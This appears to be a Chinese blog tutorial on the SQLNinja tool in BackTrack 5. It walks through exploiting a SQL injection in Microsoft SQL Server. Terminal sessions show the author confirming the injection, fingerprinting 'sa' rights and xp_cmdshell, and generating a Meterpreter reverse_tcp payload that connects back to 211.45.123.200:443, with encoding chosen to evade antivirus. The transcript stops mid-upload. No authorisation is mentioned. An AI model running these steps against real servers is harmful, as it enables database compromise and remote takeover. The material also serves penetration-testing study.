Back Track 5学习之SQLNinja

最近在学习BackTrack 5下渗透测试，刚好在学习SQLMap和SQLNinja，以下是SQLNinja的用法，SQLMap的用法见之前的博客。
[BackTrack=root@perl-exploits:/pentest/database/sqlninja-0.2.3]root@perl-exploits:/pentest/database/sqlninja-0.2.3[/BackTrack]# ./sqlninja -m
Usage: ./sqlninja
       -m <mode> : Required. Available modes are:
         t/test – test whether the injection is working
         f/fingerprint – fingerprint user, xp_cmdshell and more
         b/bruteforce – bruteforce sa account
         e/escalation – add user to sysadmin server role
         x/resurrectxp – try to recreate xp_cmdshell
         u/upload – upload a .scr file
         s/dirshell – start a direct shell
         k/backscan – look for an open outbound port
         r/revshell – start a reverse shell
         d/dnstunnel – attempt a dns tunneled shell
         c/sqlcmd – issue a ‘blind’ OS command
         m/metasploit – wrapper to Metasploit stagers
       -f <file> : configuration file (default: sqlninja.conf)
       -p <password> : sa password
       -w <wordlist> : wordlist to use in bruteforce mode (dictionary method
                     only)
       -v : verbose output
       -d <mode> : activate debug
         1 – print each injected command
         2 – print each raw HTTP request
         3 – print each raw HTTP response
         all – all of the above
       …see sqlninja-howto.html for details
       上面这么多参数，我们一一解释
./sqlninja -m 加载modle
下面是一些模块参数
-t/test 测试当前模块和配置文件是否工作正常
./sqlninja -m test
Sqlninja rel. 0.2.3
Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>
[+] Parsing configuration file…………….
[+] Evasion technique(s):
– query hex-encoding
– comments as separator
– random URI encoding
[+] Checking whether the remote server uses SSL
[+] The remote server does not talk SSL
[+] Target is: www.maimai.xxx
[+] Trying to inject a ‘waitfor delay’….
[+] Injection was successful! Let’s rock !!
ok,测试成功，表明当前注射点可以识别，存在注入漏洞。

f/fingerprint – fingerprint user, xp_cmdshell and more   这个是判断数据库类型，当前用户，xpcmdshell是否存在可以用。
[BackTrack=root@perl-exploits:/pentest/database/sqlninja-0.2.3]root@perl-exploits:/pentest/database/sqlninja-0.2.3[/BackTrack]# ./sqlninja -m fingerprint
Sqlninja rel. 0.2.3
Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>
[+] Parsing configuration file…………….
[+] Evasion technique(s):
– query hex-encoding
– comments as separator
– random URI encoding
[+] Checking whether the remote server uses SSL
[+] The remote server does not talk SSL
[+] Target is: www.maimai.xxx
What do you want to discover ?
   0 – Database version (2000/2005)
   1 – Database user
   2 – Database user rights
   3 – Whether xp_cmdshell is working
   4 – Whether mixed or Windows-only authentication is used
   a – All of the above
   h – Print this menu
   q – exit
>
0   检测当前数据库版本
1   当前数据库用户
2 当前数据库用户权限
3 检查xp_cmdshell是否可以用
4 是否windows本地系统权限
a 检查上面所有的
h显示当前帮助菜单
1 退出
> a
[+] Checking SQL Server version…
   Target: Microsoft SQL Server 2000
[+] Checking whether we are sysadmin…
   We seem to be ‘sa’
[+] Checking whether xp_cmdshell is available
   xp_cmdshell seems to be available
   Mixed authentication seems to be used
>
m/metasploit 使用metasploit里面的shellcode，这个默认是没有启用的，需要修改sqlninja.conf中metasploit配置位置修改
# Path to metasploit executable. Only needed if msfpayload and
# msfcli are not already in the path
msfpath = /pentest/exploits/framework3/ #去掉前面的注释符号，这里修改成你的framework3的安装位置
[BackTrack=root@perl-exploits:/pentest/database/sqlninja-0.2.3]root@perl-exploits:/pentest/database/sqlninja-0.2.3[/BackTrack]# ./sqlninja -m metasploit
Sqlninja rel. 0.2.3
Copyright (C) 2006-2008 icesurfer <r00t@northernfortress.net>
[+] Parsing configuration file…………….
[+] Evasion technique(s):
– query hex-encoding
– comments as separator
– random URI encoding
[+] Checking whether the remote server uses SSL
[+] The remote server does not talk SSL
[+] Target is: www.maimai.xxx
[+] Entering Metasploit module. In order to use this module you need to
have found an available TCP port, either inbound or outbound
[+] Checking Metasploit3 availability….
[+] Which payload you want to use?
1: Meterpreter
2: VNC
>
这里执行metasploit，因为调用了metasploit里面的payload,其中有两种方式，一种是Meterpreter,一种是vnc反向链接，如果是在console下面推荐使用Meterpreter,如果是在GNOME或者其他视窗环境下推荐使用VNC,(这里要说一下，必须你机器上要装vncserver,经过测试证实，不能正确的调用metasploit里面的vncserver)
OK,我们把两种方法都测试一下。首先执行Meterpreter
> 1
[+] Which type of connection you want to use?
1: bind_tcp
2: reverse_tcp
>
这里要我们选择连接方式，1 是bind_tcp,在服务器上bind一个端口，2.reverse_tcp,反向链接到本地。考虑到服务器上有防火墙之类的，我们一般推荐2，但是如果你没有外网IP或者外网VPN，推荐使用bind_tcp
这里我们选择2
> 2
[+] Enter local port number
> 443
这里需要我们输入一个本地一个端口，推荐使用未被占用的端口，这里输入443
[+] Choose a payload encoding method
0 – none
1 – Alpha2 Alphanumeric Mixedcase
2 – Alpha2 Alphanumeric Uppercase
3 – Avoid UTF8/tolower
4 – Call+4 Dword XOR
5 – Single-byte XOR Countdown
6 – Variable-length Fnstenv/mov Dword XOR
7 – Polymorphic Jump/Call XOR Additive Feedback
8 – Non-Alpha
9 – Non-Upper
10 – Polymorphic XOR Additive Feedback
11 – Alpha2 Alphanumeric Unicode Mixedcase
12 – Alpha2 Alphanumeric Unicode Uppercase
>
这里要你输入shellcode的加密方式，主要是为了避免被服务器上的杀毒软件查杀。这里可根据实际条件选择，我选择0
[+] Calling msfpayload3 to create the payload…
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 278
Options: exitfunc=process,lport=443,lhost=211.45.123.200
[+] Payload (met50838.exe) created. Now converting it to debug script
[+] Uploading /tmp/met50838.scr debug script…………